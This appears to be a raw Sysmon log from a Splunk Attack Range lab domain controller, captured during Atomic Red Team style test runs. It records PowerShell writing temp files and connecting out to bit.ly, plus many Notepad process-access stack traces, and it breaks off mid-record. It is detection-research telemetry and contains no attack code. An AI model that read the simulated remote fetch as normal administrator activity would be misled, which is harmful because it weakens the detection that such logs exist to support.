C:\Users\ADMINI~1\AppData\Local\Temp\2\ATTACKRANGE\Administrator{5ABCFE62-99F3-603E-CE9A-500000000000}0x509ace2HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{5ABCFE62-D502-6040-CD4B-00000000AD01}6732C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 11241100x80000000000000002203336Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:59.705{5ABCFE62-D502-6040-CD4B-00000000AD01}6732C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\art-err.txt2021-03-04 14:07:47.393 11241100x80000000000000002203335Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:59.705{5ABCFE62-D502-6040-CD4B-00000000AD01}6732C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\art-out.txt2021-03-04 14:07:47.393 23542300x80000000000000002203334Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:59.627{5ABCFE62-D502-6040-CD4B-00000000AD01}6732ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\art-out.txtMD5=E034B639FD06D8BE47ED3BD328CA0578,SHA256=433FF713043217547E48416D4009C0E033A8632A30B33D3534902A097BCA16F6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203333Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:59.580{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=56946BCA409C987F9F219B251B85E936,SHA256=EB46D00E6769A5B36515EC68659C7817394E625A29EE7650930AF967AC3F0222,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203332Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:59.580{5ABCFE62-E9BE-6040-474E-00000000AD01}5828ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203331Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:59.534{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=2969D13B77B27414D25E266A9B5C0F5C,SHA256=EC083FA3A5BC911664CD72811322823DC07406581747E50FB9B93EA1ACA5FBD7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000002203330Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:59.377{5ABCFE62-E9BE-6040-474E-00000000AD01}5828C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\Default_File_Path.ps12021-03-03 16:54:22.132 23542300x80000000000000002203329Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:59.377{5ABCFE62-E9BE-6040-474E-00000000AD01}5828ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\Default_File_Path.ps1MD5=DCE6250005968B2E1003165602177255,SHA256=4013A9DB2598C677B34A6C4753E91216B844C567D5110931647C38680DE03BAF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203328Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:59.252{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D393053F66582472B2DEDBB3A3F28960,SHA256=C0CD6D5D0C29C7A170C1742D47388C0B2E3B5F332258C319534259F89C65911B,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002203327Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:55.573{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local61624- 354300x80000000000000002203326Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:55.073{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60705-false10.0.1.12-8000- 11241100x80000000000000002203325Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:59.112{5ABCFE62-E9BE-6040-474E-00000000AD01}5828C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\Default_File_Path.ps12021-03-03 16:54:22.132 23542300x80000000000000002203324Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:59.112{5ABCFE62-E9BE-6040-474E-00000000AD01}5828ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\Default_File_Path.ps1MD5=DCE6250005968B2E1003165602177255,SHA256=4013A9DB2598C677B34A6C4753E91216B844C567D5110931647C38680DE03BAF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002203423Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:00.971{5ABCFE62-E9C0-6040-494E-00000000AD01}46043708C:\Windows\SYSTEM32\Notepad.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\SHELL32.dll+cff37|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF8037B8D88C8)|UNKNOWN(FFFFF5A6522B4978)|UNKNOWN(FFFFF5A6522AF625)|UNKNOWN(FFFFF5A6522B0B4A)|UNKNOWN(FFFFF5A6522FEF55)|UNKNOWN(FFFFF8037B5EFE03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9764|C:\Windows\System32\win32u.dll+10c4 10341000x80000000000000002203422Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:00.971{5ABCFE62-E9C0-6040-494E-00000000AD01}46043708C:\Windows\SYSTEM32\Notepad.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+cfdbd|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000002203421Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:00.971{5ABCFE62-E9C0-6040-494E-00000000AD01}46043708C:\Windows\SYSTEM32\Notepad.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+cfd39|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000002203420Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:00.971{5ABCFE62-E9C0-6040-494E-00000000AD01}46043708C:\Windows\SYSTEM32\Notepad.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+cfd1d|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000002203419Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:00.971{5ABCFE62-E9C0-6040-494E-00000000AD01}46043708C:\Windows\SYSTEM32\Notepad.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+cfd1d|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b 354300x80000000000000002203418Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:56.699{00000000-0000-0000-0000-000000000000}5828<unknown process>-tcptruefalse10.0.1.14win-dc-228.attackrange.local60706-false67.199.248.11bit.ly80http 10341000x80000000000000002203417Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:00.955{5ABCFE62-E9C0-6040-494E-00000000AD01}46043708C:\Windows\SYSTEM32\Notepad.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\SHELL32.dll+cff37|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF8037B8D88C8)|UNKNOWN(FFFFF5A6522B4978)|UNKNOWN(FFFFF5A6522AF625)|UNKNOWN(FFFFF5A6522B0B4A)|UNKNOWN(FFFFF5A6522FEF55)|UNKNOWN(FFFFF8037B5EFE03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9764|C:\Windows\System32\win32u.dll+10c4 10341000x80000000000000002203416Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:00.955{5ABCFE62-E9C0-6040-494E-00000000AD01}46043708C:\Windows\SYSTEM32\Notepad.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\SHELL32.dll+cff37|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF8037B8D88C8)|UNKNOWN(FFFFF5A6522B4978)|UNKNOWN(FFFFF5A6522AF625)|UNKNOWN(FFFFF5A6522B0B4A)|UNKNOWN(FFFFF5A6522FEF55)|UNKNOWN(FFFFF8037B5EFE03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9764|C:\Windows\System32\win32u.dll+10c4 10341000x80000000000000002203415Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:00.924{5ABCFE62-E9C0-6040-494E-00000000AD01}46043708C:\Windows\SYSTEM32\Notepad.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+cfdbd|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+28f5c|C:\Windows\system32\explorerframe.dll+28eb7|C:\Windows\system32\explorerframe.dll+2a6e4|C:\Windows\system32\explorerframe.dll+611e6|C:\Windows\system32\explorerframe.dll+5a750|C:\Windows\System32\COMDLG32.dll+1e967|C:\Windows\System32\SHLWAPI.dll+9fc1|C:\Windows\System32\SHLWAPI.dll+9edd|C:\Windows\System32\SHLWAPI.dll+9d96|C:\Windows\System32\SHLWAPI.dll+9c0d|C:\Windows\System32\SHELL32.dll+13c997|C:\Windows\System32\SHELL32.dll+13be18|C:\Windows\System32\SHELL32.dll+13ba1b|C:\Windows\System32\SHELL32.dll+13bb87|C:\Windows\System32\SHELL32.dll+13bb0a|C:\Windows\System32\COMDLG32.dll+10e08 10341000x80000000000000002203414Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:00.924{5ABCFE62-E9C0-6040-494E-00000000AD01}46043708C:\Windows\SYSTEM32\Notepad.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+cfd39|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+28f5c|C:\Windows\system32\explorerframe.dll+28eb7|C:\Windows\system32\explorerframe.dll+2a6e4|C:\Windows\system32\explorerframe.dll+611e6|C:\Windows\system32\explorerframe.dll+5a750|C:\Windows\System32\COMDLG32.dll+1e967|C:\Windows\System32\SHLWAPI.dll+9fc1|C:\Windows\System32\SHLWAPI.dll+9edd|C:\Windows\System32\SHLWAPI.dll+9d96|C:\Windows\System32\SHLWAPI.dll+9c0d|C:\Windows\System32\SHELL32.dll+13c997|C:\Windows\System32\SHELL32.dll+13be18|C:\Windows\System32\SHELL32.dll+13ba1b|C:\Windows\System32\SHELL32.dll+13bb87|C:\Windows\System32\SHELL32.dll+13bb0a|C:\Windows\System32\COMDLG32.dll+10e08 10341000x80000000000000002203413Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:00.924{5ABCFE62-E9C0-6040-494E-00000000AD01}46043708C:\Windows\SYSTEM32\Notepad.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+cfd1d|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+28f5c|C:\Windows\system32\explorerframe.dll+28eb7|C:\Windows\system32\explorerframe.dll+2a6e4|C:\Windows\system32\explorerframe.dll+611e6|C:\Windows\system32\explorerframe.dll+5a750|C:\Windows\System32\COMDLG32.dll+1e967|C:\Windows\System32\SHLWAPI.dll+9fc1|C:\Windows\System32\SHLWAPI.dll+9edd|C:\Windows\System32\SHLWAPI.dll+9d96|C:\Windows\System32\SHLWAPI.dll+9c0d|C:\Windows\System32\SHELL32.dll+13c997|C:\Windows\System32\SHELL32.dll+13be18 10341000x80000000000000002203412Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:00.924{5ABCFE62-E9C0-6040-494E-00000000AD01}46043708C:\Windows\SYSTEM32\Notepad.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+cfd1d|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+28f5c|C:\Windows\system32\explorerframe.dll+28eb7|C:\Windows\system32\explorerframe.dll+2a6e4|C:\Windows\system32\explorerframe.dll+611e6|C:\Windows\system32\explorerframe.dll+5a750|C:\Windows\System32\COMDLG32.dll+1e967|C:\Windows\System32\SHLWAPI.dll+9fc1|C:\Windows\System32\SHLWAPI.dll+9edd|C:\Windows\System32\SHLWAPI.dll+9d96|C:\Windows\System32\SHLWAPI.dll+9c0d|C:\Windows\System32\SHELL32.dll+13c997|C:\Windows\System32\SHELL32.dll+13be18|C:\Windows\System32\SHELL32.dll+13ba1b 10341000x80000000000000002203411Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:00.924{5ABCFE62-E9C0-6040-494E-00000000AD01}46043708C:\Windows\SYSTEM32\Notepad.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+cfdbd|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+1b27d|C:\Windows\system32\explorerframe.dll+345ab|C:\Windows\system32\explorerframe.dll+33f04|C:\Windows\system32\explorerframe.dll+32faa|C:\Windows\system32\explorerframe.dll+3308c|C:\Windows\System32\SHELL32.dll+eca73|C:\Windows\System32\SHELL32.dll+ece74|C:\Windows\system32\DUI70.dll+27a09|C:\Windows\system32\DUI70.dll+2e18d|C:\Windows\system32\DUI70.dll+15e98|C:\Windows\system32\DUI70.dll+24d26|C:\Windows\system32\DUI70.dll+24e40|C:\Windows\system32\DUI70.dll+24e40|C:\Windows\system32\DUI70.dll+24e40|C:\Windows\system32\DUI70.dll+24e40|C:\Windows\system32\DUI70.dll+365bd 10341000x80000000000000002203410Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:00.924{5ABCFE62-E9C0-6040-494E-00000000AD01}46043708C:\Windows\SYSTEM32\Notepad.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+cfd39|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+1b27d|C:\Windows\system32\explorerframe.dll+345ab|C:\Windows\system32\explorerframe.dll+33f04|C:\Windows\system32\explorerframe.dll+32faa|C:\Windows\system32\explorerframe.dll+3308c|C:\Windows\System32\SHELL32.dll+eca73|C:\Windows\System32\SHELL32.dll+ece74|C:\Windows\system32\DUI70.dll+27a09|C:\Windows\system32\DUI70.dll+2e18d|C:\Windows\system32\DUI70.dll+15e98|C:\Windows\system32\DUI70.dll+24d26|C:\Windows\system32\DUI70.dll+24e40|C:\Windows\system32\DUI70.dll+24e40|C:\Windows\system32\DUI70.dll+24e40|C:\Windows\system32\DUI70.dll+24e40|C:\Windows\system32\DUI70.dll+365bd 10341000x80000000000000002203409Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:00.924{5ABCFE62-E9C0-6040-494E-00000000AD01}46043708C:\Windows\SYSTEM32\Notepad.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+cfd1d|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+1b27d|C:\Windows\system32\explorerframe.dll+345ab|C:\Windows\system32\explorerframe.dll+33f04|C:\Windows\system32\explorerframe.dll+32faa|C:\Windows\system32\explorerframe.dll+3308c|C:\Windows\System32\SHELL32.dll+eca73|C:\Windows\System32\SHELL32.dll+ece74|C:\Windows\system32\DUI70.dll+27a09|C:\Windows\system32\DUI70.dll+2e18d|C:\Windows\system32\DUI70.dll+15e98|C:\Windows\system32\DUI70.dll+24d26|C:\Windows\system32\DUI70.dll+24e40 10341000x80000000000000002203408Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:00.924{5ABCFE62-E9C0-6040-494E-00000000AD01}46043708C:\Windows\SYSTEM32\Notepad.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+cfd1d|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+1b27d|C:\Windows\system32\explorerframe.dll+345ab|C:\Windows\system32\explorerframe.dll+33f04|C:\Windows\system32\explorerframe.dll+32faa|C:\Windows\system32\explorerframe.dll+3308c|C:\Windows\System32\SHELL32.dll+eca73|C:\Windows\System32\SHELL32.dll+ece74|C:\Windows\system32\DUI70.dll+27a09|C:\Windows\system32\DUI70.dll+2e18d|C:\Windows\system32\DUI70.dll+15e98|C:\Windows\system32\DUI70.dll+